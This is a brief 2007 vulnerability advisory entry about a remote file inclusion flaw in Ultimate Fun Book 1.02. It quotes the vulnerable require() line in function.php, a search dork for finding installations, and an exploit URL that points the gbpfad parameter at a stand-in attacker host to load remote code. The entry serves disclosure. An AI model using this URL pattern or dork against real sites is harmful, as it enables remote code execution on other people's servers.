Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability:

2007-02-23T00:00:00
ID SECURITYVULNS:DOC:16155
Type securityvulns
Reporter Securityvulns
Modified 2007-02-23T00:00:00

Description

*Ultimate Fun Book 1.02 found by:kezzap66345 contant= [:(] download script=http://www.ultimate-fun-board.de *dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*thanx= x0r0n,str0ke,shakia** ********

milw0rm.com [2007-02-20]